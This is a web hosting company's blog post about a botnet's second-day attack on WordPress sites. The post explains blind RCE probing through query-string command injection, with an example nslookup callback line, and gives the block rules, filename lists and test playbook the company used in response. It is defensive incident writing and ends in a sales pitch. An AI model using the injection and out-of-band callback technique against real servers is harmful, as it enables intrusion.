You might think that once you deploy bot protection rules, the problem is solved. We thought so too — for about 18 hours. Then the bots came back, and they'd learned from their mistakes.
This is Part 2 of our bot protection story. If you haven't read the first installment — How We Protect Our WordPress Sites from Bot Attacks — start there for the full picture of Day 1. This post covers what happened next: how an organized botnet evolved its attack strategy overnight, how we detected the shift in real time, and how we built a repeatable threat response playbook that now protects every site we host.
The Day 1 Recap
On a recent Wednesday, our Amsterdam server spiked to a load of 20.75 — roughly ten times its normal operating level. A distributed botnet was hammering two government websites with POST requests using real-looking browser user agents to bypass our LiteSpeed cache layer. We deployed updated bot protection rules fleet-wide, blocking POST-based cache bypass, fake user agent signatures, and service discovery probes. Server load dropped from 20 to under 3 within minutes. Problem solved.
Until the next morning.
Day 2: The Bots Evolve
At 9:30 AM the following day, the same server spiked again — this time to a load of 14, roughly 14 times baseline. Our monitoring caught it immediately, and when we pulled up the access logs, we saw something different. The bots had adapted.
Day 1's attack used POST requests to bypass the cache. We blocked POST requests with no referrer. So on Day 2, the attackers switched entirely to GET requests. But these weren't ordinary page loads. They were injecting shell commands directly into URL query parameters — specifically targeting Gravity Forms field parameters that get passed through the URL.
Here's what the attack looked like in the access logs. Instead of normal form field values, the query strings contained commands like curl, nslookup, wget, and base64. Some requests included hex-encoded byte sequences. Others attempted Freemarker Server-Side Template Injection (SSTI) — a technique where the attacker injects template expressions hoping the server will evaluate them and execute arbitrary code.
This wasn't a brute-force attack. This was methodical Remote Code Execution (RCE) probing by a sophisticated botnet.
How Blind RCE Detection Works
The most telling detail was the callback domain. Dozens of requests included references to a domain used exclusively for blind RCE detection. Here's the technique:
- The bot injects a command like nslookup callback-domain.net into a query parameter
- If the server is vulnerable and actually executes the injected command, it performs a DNS lookup to the callback domain
- The attacker monitors DNS queries hitting that callback domain
- If a DNS query arrives from your server's IP address, they know the server is vulnerable to command injection
- They then escalate to more dangerous payloads — data exfiltration, backdoor installation, cryptomining
This is called "out-of-band" detection. The attacker never sees the server's HTTP response — they don't need to. The callback itself is the signal. It's an elegant and dangerous technique, and it means every one of these probing requests was a test: "Can I run arbitrary commands on this machine?"
The answer, for every site we manage, was no. WordPress and Gravity Forms don't evaluate query parameters as shell commands. But the bots don't know that upfront — they spray thousands of sites hoping to find one that's running a vulnerable plugin, a misconfigured PHP handler, or an exposed debugging endpoint.
The Fingerprint That Gave Them Away
While the Day 1 bots rotated through convincing modern browser user agents, the Day 2 botnet made a mistake: every request carried a Windows NT 5.2 user agent string. That's Windows Server 2003 — an operating system released in 2003 and end-of-lifed in 2015.
Nobody is browsing the internet on Windows Server 2003 in 2026. Not a single legitimate user. This was a dead giveaway: a hardcoded user agent string in the bot's configuration that nobody had bothered to update since the botnet was originally built.
We catalog these fingerprints. They're free wins — patterns that you can block with zero risk of affecting legitimate traffic. And over 120 unique IP addresses were sharing this exact same obsolete fingerprint, confirming this was a coordinated botnet, not scattered scanners.
Building the Updated Rules
With the attack pattern identified, we drafted two new rule categories for our bot protection template:
Obsolete Operating System Blocking
Any request from Windows XP or Windows Server 2003 (the NT 5.x family) gets blocked immediately. These operating systems cannot run any modern browser. If you see one in your access logs, it is a bot — full stop. This single rule eliminated the majority of the Day 2 traffic.
Command Injection Query String Filtering
We added pattern matching on query strings for known command injection signatures: curl, wget, nslookup, base64, hex-encoded bytes, Freemarker template expressions, backtick command substitution, and the specific callback domains being used for blind RCE detection.
The key challenge with query string filtering is avoiding false positives. Legitimate form submissions, REST API calls, WooCommerce cart parameters, and WordPress admin operations all use query strings extensively. A poorly written rule here would break real functionality.
The Test Suite
Before deploying a single rule to production, we ran our automated validation suite. This is a bank of curl commands that simulates both attack patterns and legitimate traffic:
- Attack patterns: Each new rule gets tested with real payloads extracted from the access logs. Every one must return HTTP 403 (Forbidden).
- Chrome browser: A standard desktop Chrome request must return HTTP 200.
- WordPress REST API: Requests to /wp-json/ endpoints must pass through — this is how the Gutenberg editor saves content.
- WooCommerce API: Cart, checkout, and order endpoints must be unaffected.
- Gravity Forms submissions: Real form submissions with legitimate data must succeed.
- WordPress admin panel: All admin operations must work normally.
Every attack request returned 403. Every legitimate request returned 200 or the expected status code. Only then did we proceed to production deployment.
The Deployment: Detect, Analyze, Draft, Test, Stage, Prove, Expand
During this incident, we codified our threat response into a repeatable eleven-step playbook. The core steps:
- Detect: Monitoring catches the anomaly — server load spike, unusual traffic patterns, or alert from our uptime checks.
- Analyze: Pull access logs, identify the attack vector, catalog signatures (IPs, user agents, request patterns, payloads).
- Draft: Write rules targeting the identified patterns. Check for POSIX regex compliance (a lesson from Day 1 — Apache and LiteSpeed use POSIX regex, where common shortcuts silently fail).
- Test: Run the automated validation suite. Confirm blocks work and legitimate traffic passes.
- Stage: Deploy to the affected site first, with a backup. Monitor access logs to confirm attack traffic is being blocked.
- Prove: Verify the impact. On Day 2, server load dropped from 14x normal to baseline within minutes. Nearly a quarter of all traffic to the affected site was malicious — and now returning 403 instantly.
- Expand: Update the canonical template and deploy fleet-wide using our automated deployment script.
- Fleet: Verify deployment across all six servers and 125 sites — zero failures required before marking complete.
- Document: Update attack pattern catalog, incident log, and client-facing communications. Every incident improves the knowledge base for the next one.
Every production site was updated. Zero failures. Zero client-reported issues.
The Numbers Tell the Story
Here's the timeline of the Day 2 incident:
| Time | Event |
|---|---|
| 9:30 AM | Load spike detected — server at 14x normal |
| 9:35 AM | Access log analysis begins — GET-based command injection identified |
| 9:45 AM | Attack fully classified — 120+ IPs, RCE probing via form parameters |
| 10:00 AM | Updated rules drafted |
| 10:15 AM | Automated test suite passes |
| 10:20 AM | Deployed to affected site, backup taken |
| 10:25 AM | Attack traffic returning 403, load dropping |
| 11:30 AM | Fleet-wide deployment complete — zero failures |
From detection to fleet-wide resolution: two hours. From deploying to the affected site to measurable impact: five minutes.
Days 3-5: The Scanner Probes
The command injection attacks subsided, but the probing didn't stop. Over the next three days, the same server experienced daily waves of a different type: vulnerability scanner probing. Instead of injecting shell commands, these bots were systematically requesting filenames that only exist on misconfigured or compromised servers.
The access logs showed hundreds of requests per wave for files like phpinfo.php, test.php, shell.php, pi.php, and temp.php. They also probed for archive files (.7z, .tar.gz), certificate files (.pem), database files (.mdb, .sqlite), and exposed configuration files (configs.json). Each wave came from 300-560 unique IP addresses, pushing CPU above 70% and server load to nearly 8x normal.
This is a different attack category from the RCE probing on Day 2. Where command injection tries to execute code, scanner probing is reconnaissance — the bots are looking for files that would reveal server configuration details, exposed credentials, or leftover development artifacts. A single phpinfo.php file can tell an attacker your exact PHP version, loaded extensions, server paths, environment variables, and sometimes even database credentials.
None of these files exist on any site we manage. But every request still consumed server resources — LiteSpeed had to process the rewrite rules, check the filesystem, and return a 404. Multiply that by thousands of requests from hundreds of IPs, and it's a meaningful load.
We added a new rule category to our bot protection template: scanner probe filename blocking. Any request for phpinfo.php, test.php, shell.php, or similar probe filenames now returns a 403 before the server even checks whether the file exists. Same for archive extensions, certificate files, and exposed database files. The fleet scan confirmed zero legitimate uses of any of these filenames across all 125 sites — making this a zero-risk, high-impact rule.
Why Yesterday's Rules Don't Stop Today's Attacks
This is the core lesson from these two days. On Day 1, the bots used POST-based cache bypass. We blocked it. On Day 2, they switched to GET-based command injection through query strings. The attack evolved in under 24 hours.
This is why installing a security plugin or a basic WAF and walking away isn't security. It's a checkbox. Real protection requires someone watching, analyzing, and responding — not once, but continuously. The bots don't stop iterating, and your defenses can't either.
A shared hosting provider with thousands of sites and a ticket queue doesn't have time to read your access logs. A managed hosting company with a set-and-forget firewall won't notice when attackers switch from POST to GET. And the pre-built rulesets that come with popular WordPress security plugins? They block known attack signatures from last month — not the probe that started hitting your server this morning.
Layered Defense in Practice
After these incidents, our bot protection template covers six distinct layers:
- User Agent filtering: Known bot signatures, empty/stub user agents, obsolete operating systems
- URL/path blocking: Service discovery probes, config file scanning, shell upload attempts, CMS admin hunting
- Method/referrer analysis: POST requests without a referrer (real form submissions always have one)
- Query string inspection: Command injection payloads, RCE callback domains, template injection expressions
- Scanner probe filtering: Known vulnerability scanner filenames (phpinfo.php, test.php, shell.php), archive extensions (.7z, .tar.gz), certificate files (.pem), database files (.mdb, .sqlite), and exposed configuration files
- Behavioral patterns: URL fuzzing detection, API enumeration attempts
Each layer catches attacks that slip past the others. Block one technique, and the bots pivot to the next. With five layers working together, the cost of finding a bypass goes up exponentially.
And all of these rules run at the web server level — before PHP even loads, before WordPress boots, before any plugin gets a chance to process the request. A blocked bot consumes essentially zero server resources. That's why server load drops from 14x normal to baseline within minutes of deployment: hundreds of thousands of requests that were consuming PHP workers and database connections now get rejected with a lightweight 403 before they touch the application stack.
What This Means for Your Site
Every site we host runs the same battle-tested protection template. When we stop an attack against one site, every site benefits. When we identify a new bot fingerprint, it goes into the shared template. When we build a new detection rule, it deploys across the entire fleet.
This is what managed hosting actually means. Not just keeping WordPress updated and answering support tickets. It means watching the access logs, reading the attack patterns, writing the rules, testing them, and deploying them — often before clients even know something happened.
Our technology stack is built for exactly this kind of active defense, and our premium plugin suite — included with every hosting plan — provides the layered security foundation that makes rapid threat response possible.
If your current hosting provider's security plan is "we installed Wordfence" — or if you're not sure whether anyone is watching at all — let's talk. We've been doing this for 18 years, and we respond to threats in hours, not days. Check out our managed WordPress hosting plans to see what proactive protection looks like.
No comments yet. Be the first to comment!
Leave a Comment